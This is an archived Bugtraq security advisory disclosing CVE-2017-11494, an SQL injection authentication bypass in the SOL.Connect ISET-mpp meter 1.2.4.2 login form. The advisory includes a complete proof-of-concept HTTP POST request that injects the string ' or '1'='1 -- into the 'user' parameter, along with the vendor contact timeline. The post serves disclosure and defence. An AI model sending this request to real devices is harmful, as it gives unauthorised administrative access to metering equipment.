| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Tue, 1 Aug 2017 12:34:34 GMT From: andys3c@...il.com To: bugtraq@...urityfocus.com Subject: [CVE-2017-11494] SOL.Connect ISET-mpp meter 1.2.4.2 Authentication Bypass SQL Injection Vulnerability Vulnerability type: SQL injection, leading to administrative access through authentication bypass. ----------------------------------- Product: SOL.Connect ISET-mpp meter ----------------------------------- Affected version: SOL.Connect ISET-mpp meter 1.2.4.2 and possibly earlier Vulnerable parameter: user ------------------------ Credit: Andy Tan ------------------------ CVE ID: CVE-2017-11494 ------------------------ ================ Proof of Concept ================ HTTP Request: POST /_45b4a69e249c1d0ab9772763f3c97e69_/?s=login&o=/_45b4a69e249c1d0ab9772763f3c97e69_/%3fs%3dmain HTTP/1.1 Host: <IP-address> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: http://<IP-address>/_45b4a69e249c1d0ab9772763f3c97e69_/?s=login&o=/_45b4a69e249c1d0ab9772763f3c97e69_/%3fs%3dmain Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 131 action=submit&origin=%2F_45b4a69e249c1d0ab9772763f3c97e69_%2F%3Fs%3Dmain&s=login&user=admin%27+or+%271%27%3D%271+--%2B&password=asd ------------------------ Vendor contact timeline: ------------------------ 2017-07-20: Contacted vendor. No response. 2017-07-26: Contacted vendor again. No response. 2017-08-01: Public disclosure.
Powered by blists - more mailing lists